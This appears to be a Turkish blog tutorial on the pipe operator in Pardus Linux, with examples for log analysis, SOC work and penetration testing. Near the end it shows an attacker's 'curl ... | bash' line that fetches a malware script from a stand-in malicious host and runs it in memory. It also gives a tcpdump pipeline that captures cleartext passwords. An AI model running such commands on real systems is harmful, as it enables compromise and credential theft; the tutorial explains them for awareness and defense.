Pardus Linux’ta Pipe (|) Kullanımı

Linux ve Unix tabanlı sistemlerde kullanılan Pipe (|) operatörü, bir komutun çıktısını başka bir komuta giriş olarak göndermeyi sağlar.


Yani:

  • İlk komut veriyi üretir

  • Pipe (|) bu veriyi aktarır

  • İkinci komut veriyi işler

Bu yapı sayesinde Linux terminalinde çok güçlü veri işleme zincirleri kurulabilir.

Genel yapı:

komut1 | komut2

Anlamı:

“komut1 çıktısını al ve komut2’ye gönder”



Pipe Mantığını Anlamak

Örneğin:

ls

Bu komut dosyaları listeler.

Şimdi çıktıyı ekrana vermek yerine başka komuta gönderelim:

ls | less

Burada:

  • ls → dosya listesini üretir

  • less → listeyi sayfa sayfa gösterir


Pipe Kullanımının Avantajları

Pipe kullanımı:

  • Komutları birleştirir

  • Büyük çıktıları filtreler

  • Log analizi yapmayı kolaylaştırır

  • Otomasyonu güçlendirir

  • Metin işleme süreçlerini hızlandırır

Linux sistem yöneticileri ve siber güvenlik uzmanları pipe kullanımını yoğun şekilde kullanır.


En Temel Pipe Örnekleri


1. ls | more

ls | more

Dosya listesini sayfa sayfa gösterir.


2. ls | wc -l

ls | wc -l

Anlamı:

  • ls → dosyaları listeler

  • wc -l → satır sayısını sayar

Sonuç:

Dizindeki dosya sayısını verir.


3. history | grep sudo

history | grep sudo

Geçmişte kullanılan sudo komutlarını filtreler.


Pipe ile Filtreleme İşlemleri

Pipe en çok grep, awk, sed, cut, sort, uniq gibi araçlarla kullanılır.


grep ile Pipe Kullanımı

Örnek:

ps aux | grep firefox

Açıklama:

  • ps aux → çalışan işlemleri listeler

  • grep firefox → firefox geçenleri bulur


Büyük/Küçük Harf Duyarsız Arama

dmesg | grep -i usb

USB ile ilgili kernel mesajlarını gösterir.


Pipe ile Dosya Boyutu Analizi

En Büyük Dosyaları Bulmak

du -ah | sort -rh | head

Açıklama:

KomutGörev
du -ah            Dosya boyutlarını listeler
sort -rh            Büyükten küçüğe sıralar
head            İlk 10 sonucu gösterir

Pipe ile Ağ Analizi

Açık Portları Listeleme

ss -tuln | grep LISTEN

Dinleme yapan servisleri gösterir.


IP Adreslerini Filtreleme

ip a | grep inet

Sistemdeki IP adreslerini listeler.


Pipe ile Log Analizi

Linux sistemlerinde pipe en çok log analizinde kullanılır.


Hata Mesajlarını Bulma

journalctl | grep error

SSH Girişlerini İnceleme

cat /var/log/auth.log | grep ssh

Bazı sistemlerde:

journalctl | grep ssh

Pipe Zinciri Oluşturma

Birden fazla pipe kullanılabilir.

Örnek:

ps aux | grep apache | sort

İşleyiş:

  1. İşlemleri listele

  2. apache geçenleri filtrele

  3. alfabetik sırala


Gelişmiş Pipe Örnekleri


1. En Çok RAM Kullanan İşlemler

ps aux | sort -rk 4 | head

2. En Çok CPU Kullanan İşlemler

ps aux | sort -rk 3 | head

3. Belirli Uzantıdaki Dosyaları Sayma

ls | grep ".txt" | wc -l

4. Ağ Trafiği Analizi

netstat -an | grep ESTABLISHED

awk ile Pipe Kullanımı

awk, sütun bazlı veri işlemede kullanılır.

Örnek:

df -h | awk '{print $1,$5}'

Disk kullanım yüzdesini gösterir.


cut ile Pipe Kullanımı

Örnek:

echo "Ali,Veli,Ayşe" | cut -d "," -f2

Çıktı:

Veli

sed ile Pipe Kullanımı

Metin değiştirme işlemlerinde kullanılır.

Örnek:

echo "Merhaba Dünya" | sed 's/Dünya/Linux/'

Çıktı:

Merhaba Linux

tee ile Pipe Kullanımı

Hem ekrana yazdırır hem dosyaya kaydeder.

Örnek:

ls | tee liste.txt

xargs ile Pipe Kullanımı

Pipe çıktısını komut parametresine dönüştürür.

Örnek:

find . -name "*.log" | xargs rm

.log dosyalarını siler.

Daha güvenli kullanım:

find . -name "*.log" -print0 | xargs -0 rm

Pipe ve Yönlendirme Farkı

OperatörGörev
`            `
>            Çıktıyı dosyaya yazar
>>            Dosyaya ekleme yapar

Örnek:

ls | wc -l

ve

ls > liste.txt

aynı şey değildir.


Pipe ile Hata Çıktısını Aktarma

Normalde pipe sadece standart çıktıyı aktarır.

Hataları da göndermek için:

komut 2>&1 | grep hata

Örnek:

find / 2>&1 | grep denied

Pipe Kullanırken Performans

Pipe işlemleri:

  • Bellek kullanımını azaltır

  • Geçici dosya ihtiyacını azaltır

  • Büyük veri işlemlerini hızlandırır

Bu nedenle Linux sistemlerinde çok önemlidir.


Siber Güvenlikte Pipe Kullanımı

Siber güvenlik uzmanları pipe kullanımını:

  • Log analizi

  • Ağ trafiği inceleme

  • Zararlı süreç tespiti

  • OSINT veri işleme

  • Büyük çıktı filtreleme

işlerinde yoğun kullanır.

Linux sistemlerinde kullanılan Pipe (|) operatörü, siber güvenlik uzmanlarının en sık kullandığı terminal araçlarından biridir. Çünkü güvenlik analizlerinde büyük miktarda veri hızlı şekilde işlenmeli, filtrelenmeli ve anlamlı hale getirilmelidir.

Pipe kullanımı sayesinde bir komutun çıktısı başka bir güvenlik analiz aracına aktarılır ve böylece güçlü analiz zincirleri oluşturulur.


Pipe Siber Güvenlikte Neden Önemlidir?

Siber güvenlikte:

  • Log kayıtları milyonlarca satır olabilir

  • Ağ trafiği sürekli akar

  • Sistem süreçleri sürekli değişir

  • Zararlı aktiviteler küçük detaylarda gizlenebilir

Pipe kullanımı:

  • Büyük verileri filtrelemeyi

  • Şüpheli aktiviteleri ayıklamayı

  • Hızlı analiz yapmayı

  • Otomasyon kurmayı

  • Olay müdahalesini hızlandırmayı

sağlar.


Siber Güvenlikte Pipe Kullanım Alanları


1. Log Analizi

Log analizi siber güvenliğin temelidir.

Pipe sayesinde:

  • başarısız girişler

  • saldırı denemeleri

  • yetkisiz erişimler

  • hata kayıtları

kolayca filtrelenebilir.

Örnek

journalctl | grep failed

Anlamı:

  • journalctl → sistem loglarını getirir

  • grep failed → başarısız olayları filtreler


SSH Saldırı Tespiti

cat /var/log/auth.log | grep ssh

Bu komut:

  • SSH girişlerini

  • başarısız denemeleri

  • brute force saldırılarını

incelemek için kullanılır.


2. Ağ Trafiği Analizi

Siber güvenlik uzmanları ağ bağlantılarını pipe ile analiz eder.

Açık Portları Görme

ss -tuln | grep LISTEN

Dinleme yapan servisleri gösterir.


Aktif Bağlantıları İzleme

netstat -an | grep ESTABLISHED

Sistemde aktif bağlantıları listeler.

Bu yöntem:

  • zararlı bağlantıları

  • backdoor erişimlerini

  • şüpheli uzak bağlantıları

tespit etmekte kullanılır.


3. Zararlı Süreç (Malware Process) Analizi

Şüpheli İşlem Arama

ps aux | grep python

veya:

ps aux | grep nc

Saldırganlar bazen:

  • python

  • perl

  • bash

  • nc (netcat)

kullanarak ters bağlantılar açabilir.

Pipe ile bu süreçler kolayca filtrelenebilir.


4. Büyük Veri İçinde Arama

Siber güvenlik analizlerinde çok büyük dosyalar incelenir.

Pipe sayesinde sadece gerekli bilgiler alınır.

Örnek

cat access.log | grep admin

Web sunucusu loglarında “admin” geçen istekleri gösterir.


SQL Injection Tespiti

cat access.log | grep "UNION SELECT"

Şüpheli SQL Injection denemelerini filtreleyebilir.


XSS Denemeleri Arama

cat access.log | grep "<script>"

Cross Site Scripting saldırılarını aramak için kullanılabilir.


5. Adli Bilişim (Digital Forensics)

Pipe kullanımı olay inceleme süreçlerinde çok önemlidir.

Büyük Dosyalarda Veri Çekme

strings malware.exe | grep http

Zararlı yazılım içindeki URL’leri arar.


Şüpheli Alanları Filtreleme

strings dump.bin | grep password

Bellek dökümlerinde parola izleri aranabilir.


6. OSINT ve Veri İşleme

Açık kaynak istihbarat çalışmalarında pipe çok kullanılır.

Domain Listesi Temizleme

cat domains.txt | sort | uniq

Tekrarlanan domainleri temizler.


IP Adreslerini Ayıklama

cat logs.txt | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}'

Loglardan IP adreslerini çıkarır.


7. Otomasyon ve Güvenlik Scriptleri

Pipe, Bash scriptlerinde otomasyon için kritik öneme sahiptir.

Örnek Güvenlik Scripti

ps aux | grep apache | wc -l

Apache süreç sayısını hesaplar.


Başarısız SSH Sayısı

cat /var/log/auth.log | grep Failed | wc -l

Başarısız SSH giriş denemelerini sayar.

Bu tarz yapılar:

  • SIEM sistemlerinde

  • SOC merkezlerinde

  • güvenlik otomasyonlarında

yoğun şekilde kullanılır.


8. Siber Güvenlik Araçlarında Pipe Kullanımı

Birçok güvenlik aracı pipe mantığıyla çalışır.

Örneğin:

AraçKullanım
grep        Zararlı veri filtreleme
awk        Log sütun analizi
sed        Veri temizleme
cut        Alan ayırma
sort        Şüpheli kayıt sıralama
uniq        Tekilleştirme
tee        Kayıt alma
xargs        Toplu işlem yapma

SOC (Security Operations Center) İçin Önemi

SOC analistleri günlük olarak:

  • milyonlarca log kaydı

  • ağ trafiği

  • güvenlik uyarısı

incelemek zorundadır.

Pipe kullanımı:

  • analiz süresini azaltır

  • hızlı filtreleme sağlar

  • olay müdahalesini hızlandırır

  • insan hatasını azaltır


Red Team ve Pentest Çalışmalarında Pipe

Sızma testlerinde pipe çok yoğun kullanılır.

Subdomain Analizi

cat subdomains.txt | sort | uniq

Açık Port Filtreleme

nmap scan.txt | grep open

URL Ayıklama

cat urls.txt | grep admin

Blue Team İçin Önemi

Savunma ekipleri pipe sayesinde:

  • IOC analizi

  • log filtreleme

  • olay müdahalesi

  • zararlı aktivite tespiti

işlerini hızlandırır.


Pipe Kullanımı Siber Güvenlik Uzmanına Ne Kazandırır?

AvantajAçıklama
Hız        Büyük veriyi hızlı işler
Otomasyon        Komut zincirleri oluşturur
Filtreleme        Şüpheli veriyi ayıklar
Analiz        Log ve ağ incelemesini kolaylaştırır
Esneklik        Farklı araçları birleştirir
Verimlilik        Tek satırda güçlü işlemler sağlar

Sonuç

Pipe (|) operatörü Linux tabanlı siber güvenlik çalışmalarının temel taşlarından biridir.

Özellikle:

  • SOC analizi

  • SIEM log işleme

  • ağ güvenliği

  • zararlı yazılım analizi

  • olay müdahalesi

  • OSINT

  • adli bilişim

alanlarında vazgeçilmezdir.

Linux terminalini etkin kullanmak isteyen bir siber güvenlik uzmanının pipe mantığını çok iyi öğrenmesi gerekir. Çünkü modern güvenlik analizlerinin büyük bölümü komut zincirleri ve veri filtreleme üzerine kuruludur.


Pratik Pipe Örnekleri

Son 20 hata kaydı

journalctl | grep error | tail -20

Kullanıcıları Listeleme

cat /etc/passwd | cut -d ":" -f1

Çalışan Servis Sayısı

systemctl list-units | wc -l

En Büyük 5 Dosya

du -ah | sort -rh | head -5

Pipe Kullanırken Yapılan Yaygın Hatalar

Hatalı:

ls || grep txt

|| pipe değildir.


Doğru:

ls | grep txt

Pipe Kullanımında Faydalı Komutlar

KomutAmaç
grep                Filtreleme
awk                Sütun işleme
sed                Metin değiştirme
cut                Veri ayırma
sort                Sıralama
uniq                Tekilleştirme
wc                Sayma
head                İlk satırlar
tail                Son satırlar
tee                Dosyaya ve ekrana yazdırma
xargs                Parametre dönüştürme

Sonuç

Pipe (|) operatörü Linux terminalinin en güçlü özelliklerinden biridir.

Özellikle Pardus Linux’ta:

  • Sistem yönetimi

  • Log inceleme

  • Veri işleme

  • Güvenlik analizleri

  • Otomasyon

gibi alanlarda büyük kolaylık sağlar.

Pipe mantığını öğrendikten sonra Linux komutlarını birbirine bağlayarak çok gelişmiş işlemler gerçekleştirebilirsiniz.




Pardus Uçbiriminde Pipe (|) Kullanımı: Komutların Gücünü Birleştirmek

Pardus işletim sisteminde uçbirim (terminal) kullanırken, tek bir komutun yapabilecekleri genellikle belirli bir görevle sınırlıdır. Örneğin; ls komutu dosyaları listeler, grep komutu metin arar, sort komutu sıralama yapar. Ancak bu komutları bir araya getirdiğinizde, uçbirim gerçek bir güç merkezine dönüşür.

İşte tam bu noktada Pipe (Boru) operatörü olan dik çizgi | devreye girer.

(Not: Pipe işaretini Türkçe Q klavyelerde genellikle Alt Gr + < tuşlarına veya Enter tuşunun sol üstündeki Alt Gr + - tuşlarına birlikte basarak çıkarabilirsiniz.)

Pipe (|) Nedir ve Nasıl Çalışır?

Pipe (|), Unix ve Linux tabanlı sistemlerde bir komutun çıktısını (output), doğrudan bir sonraki komutun girdisi (input) olarak aktarmaya yarayan bir araçtır.

Bunu bir fabrikadaki üretim bandı (montaj hattı) gibi düşünebilirsiniz:

  1. Birinci işçi (1. Komut) ham maddeyi işler ve bir ürün ortaya çıkarır.

  2. Ürünü yere koymak (dosyaya kaydetmek) yerine, doğrudan ikinci işçinin (2. Komut) eline verir.

  3. İkinci işçi bu ürünü alır, kendi işlemini yapar ve bir sonrakine aktarır.

Temel Sözdizimi:

Bash:
komut1 | komut2 | komut3

Burada komut1 çalışır, ürettiği sonuç ekrana yazdırılmak yerine komut2'ye gönderilir. komut2 bu veriyi işler ve komut3'e gönderir.


En Sık Kullanılan Pipe Senaryoları ve Örnekler

Pipe'ın mantığını anlamanın en iyi yolu, günlük hayatta en çok karşılaşılan kullanım senaryolarını incelemektir.

1. Uzun Çıktıları Sayfalandırmak (less veya more ile)

Eğer /etc dizini altındaki tüm dosyaları listelemek isterseniz (ls -la /etc), liste o kadar uzundur ki ekrandan hızla akıp gider ve sadece son birkaç satırı görürsünüz. Pipe ile bu çıktıyı bir sayfalandırıcıya gönderebilirsiniz.

Bash:
ls -la /etc | less
  • Ne yapar? ls komutunun devasa çıktısını alır ve less komutuna verir. Böylece listeyi klavyenizdeki yön tuşlarıyla yukarı/aşağı kaydırarak rahatça okuyabilirsiniz. (Çıkmak için q tuşuna basmanız yeterlidir.)

2. Çıktılar İçinde Arama Yapmak (grep ile)

Sisteminizde çalışan yüzlerce süreç (program) arasından sadece "firefox" tarayıcısına ait olanları bulmak istiyorsunuz.

Bash:
ps aux | grep firefox
  • Ne yapar? ps aux sistemdeki tüm süreçleri listeler. Pipe bu listeyi grep komutuna aktarır. grep sadece içinde "firefox" kelimesi geçen satırları filtreler ve ekrana yazdırır.

3. Satırları, Kelimeleri veya Dosyaları Saymak (wc ile)

Bulunduğunuz dizinde tam olarak kaç adet dosya ve klasör olduğunu öğrenmek istiyorsunuz. Oturup tek tek saymak yerine:

Bash:
ls -1 | wc -l
  • Ne yapar? ls -1 (rakam olan 1), her dosyayı alt alta tek bir satırda listeler. Pipe bu listeyi wc -l (word count - lines) komutuna gönderir. wc sadece toplam satır sayısını hesaplar ve size örneğin 42 gibi tek bir sayı verir.

4. Çıktıları Alfabetik Olarak Sıralamak (sort ile)

Elinizde karışık isimlerin olduğu bir isimler.txt dosyası olsun. İçeriği okuyup alfabetik sıralamak için:

Bash:
cat isimler.txt | sort
  • Ne yapar? cat komutu dosyanın içeriğini okur. Pipe bu metni sort komutuna iletir, sort ise metni A'dan Z'ye sıralayıp ekrana basar.

5. Zincirleme Kullanım (Birden Fazla Pipe)

İşin asıl eğlenceli ve güçlü kısmı burasıdır. Birden fazla komutu uca uca ekleyebilirsiniz. Örneğin, bir metin dosyasındaki tüm isimleri alfabetik sıralamak ve aynı isimden birden fazla varsa bunları teke düşürmek isteyelim:

Bash:
cat isimler.txt | sort | uniq
  • Ne yapar?

    1. cat dosyayı okur.

    2. Çıktı sort'a gider ve isimler sıralanır (Çünkü uniq komutunun düzgün çalışması için verinin sıralı olması gerekir).

    3. Sıralı liste uniq komutuna gider. uniq tekrarlayan kayıtları siler ve tertemiz, benzersiz bir liste sunar.


Kritik Bir Ayrım: Pipe (|) vs. Yönlendirme (>)

Pardus'a yeni başlayanların en sık karıştırdığı iki kavram | (Pipe) ve > (Yönlendirme) işaretleridir. İkisi tamamen farklı işler yapar:

  • Pipe (|) veriyi bir KOMUTA gönderir.

    • Doğru: ls | grep "belge" (Çıktıyı grep programına ver)

  • Yönlendirme (>) veriyi bir DOSYAYA kaydeder.

    • Doğru: ls > listem.txt (Çıktıyı listem.txt adında bir dosya oluşturup içine yaz)

    • Yanlış: ls | listem.txt (Hata verir, çünkü listem.txt çalıştırılabilir bir program değildir)

Eğer işlenmiş bir veriyi en sonunda kaydetmek isterseniz, ikisini birleştirebilirsiniz:

Bash:
ps aux | grep firefox > firefox_surecleri.txt

(Bu komut, tüm süreçler içinden firefox olanları filtreler ve sonucu bir metin dosyasına kaydeder.)


Özet

Pipe (|), Pardus ve Linux dünyasının kalbidir. Unix'in "Her program tek bir işi yapmalı ve onu çok iyi yapmalıdır" felsefesinin temel taşıdır. Devasa ve karmaşık tek bir program kullanmak yerine; grep, sort, wc, cat gibi minik ama yetenekli araçları birer Lego parçası gibi | ile birbirine bağlayarak kendi özel veri işleme hattınızı saniyeler içinde kurabilirsiniz.

Linux sistemlerdeki Boru (Pipe - |) operatörü, siber güvenlik uzmanlarının (özellikle SOC analistleri, sızma testi uzmanları ve sistem yöneticilerinin) adeta İsviçre çakısıdır.

Siber güvenlikte hız, esneklik ve devasa veri yığınları (loglar, ağ paketleri vb.) içinden anlamlı bilgiyi saniyeler içinde çekip çıkarmak hayati önem taşır. Pipe operatörü tam olarak bu gücü sağlar.

İşte Pipe (|) operatörünün siber güvenlikteki yeri ve kullanım alanları:

1. Log Analizi ve Tehdit Avcılığı (Blue Team / Savunma)

Bir sunucuya saldırı yapıldığında, saldırının izleri sistem loglarında (kayıt dosyalarında) gizlidir. Bu dosyalar genellikle on binlerce satırdan oluşur. Bir güvenlik analisti, zararlı aktiviteyi bulmak için Pipe kullanarak komutları zincirler.

  • Örnek Senaryo: Sunucuya yapılan Brute-Force (Kaba Kuvvet) parolaya tahmin saldırılarını tespit etmek.

Bash
cat /var/log/auth.log | grep "Failed password" | awk '{print $11}' | sort | uniq -c | sort -nr | head -n 5
  • Ne yapar?

    1. Log dosyasını okur (cat).

    2. Sadece "Başarısız parola" hatalarını filtreler (grep).

    3. Sadece saldırganın IP adresinin olduğu sütunu çeker (awk).

    4. IP adreslerini sıralar ve aynı olanları sayarak gruplar (sort | uniq -c).

    5. En çoktan en aza doğru sıralar ve en çok saldıran 5 IP adresini ekrana basar (sort -nr | head -n 5).

      (Bu işlem manuel yapılmak istense saatler sürerken, Pipe ile milisaniyeler içinde sonuç verir.)

2. Bilgi Toplama ve Keşif (Red Team / Saldırı)

Sızma testi uzmanları (Etik Hackerlar), hedef ağda hangi cihazların ve portların açık olduğunu bulmak için çeşitli araçlar kullanır. Bu araçların karmaşık çıktılarını temizlemek ve sadece hedeflenen veriyi elde etmek için Pipe kullanılır.

  • Örnek Senaryo: Ağdaki aktif cihazların IP adreslerini hızlıca bir listeye dönüştürmek.

Bash:
nmap -sn 192.168.1.0/24 | grep "Nmap scan report" | cut -d " " -f 5
  • Ne yapar? Nmap aracının ürettiği uzun rapordan sadece "aktif cihaz raporu" satırlarını filtreler ve o satırların içinden yalnızca IP adreslerini kesip çıkarır. Sonraki aşamada bu IP listesi başka bir güvenlik aracına aktarılabilir.

3. Gerçek Zamanlı Ağ Trafiği Analizi

Ağ üzerinden akan paketleri gerçek zamanlı olarak izlerken, sadece belirli bir şüpheli trafiğe odaklanmak için Pipe hayat kurtarır.

  • Örnek Senaryo: Ağda sadece şifresiz HTTP trafiği içinde geçen "password" (parola) kelimelerini anlık olarak yakalamak.

Bash:
tcpdump -l -A port 80 | grep -i "password"
  • Ne yapar? Ağ kartını dinleyen tcpdump aracının anlık çıktısını doğrudan grep'e bağlar. Ekrana yalnızca içinde "password" geçen veri paketleri düşer.

4. Siber Saldırı Vektörü Olarak Kullanımı (Zararlı Yazılım ve Fileless Malware)

Pipe sadece savunma için değil, saldırganlar tarafından da aktif olarak kullanılır. Özellikle diske hiçbir dosya yazmadan (Antivirüsleri atlatmak için) bellekte doğrudan zararlı kod çalıştırmak amacıyla Fileless (Dosyasız) saldırılarda sıkça görülür.

  • Saldırgan Örneği (Dikkat Edilmesi Gereken Yöntem):

Bash:
curl -s http://zararli-site.com/malware.sh | bash
  • Ne yapar? curl komutu uzak sunucudaki bir zararlı betiği (script) indirir, ancak bunu bilgisayardaki bir klasöre kaydetmek yerine Pipe (|) ile doğrudan bash (komut satırı çalıştırıcısı) programına yollar. Zararlı yazılım diske hiç dokunmadan, doğrudan bellekte çalıştırılmış olur. Bu, siber güvenlikte en çok takip edilen ve engellenmeye çalışılan komut zincirlerinden biridir.

Özetle;

Siber güvenlik dünyasında grafik arayüzlü (GUI) programlar genellikle yavaştır ve esnek değildir. Pipe (|) operatörü, güvenlik uzmanlarına kendi özel analiz araçlarını, filtrelerini ve otomasyon süreçlerini uçbirim üzerinde anında, lego parçaları gibi birleştirerek oluşturma özgürlüğü verir. Sistemde olup bitenlere tam anlamıyla hakim olmanın anahtarıdır.

Yorumlar

Bu blogdaki popüler yayınlar

Android Telefon/Tablet Ekranını Pardus ETAP 23 Yüklü Akıllı Tahtaya Yansıtma

Pardus Etap 23’de Unutulmuş Etap Yetkili Parolasını Sıfırlama

Pardus Etap 23 Yazıcı Kurulumu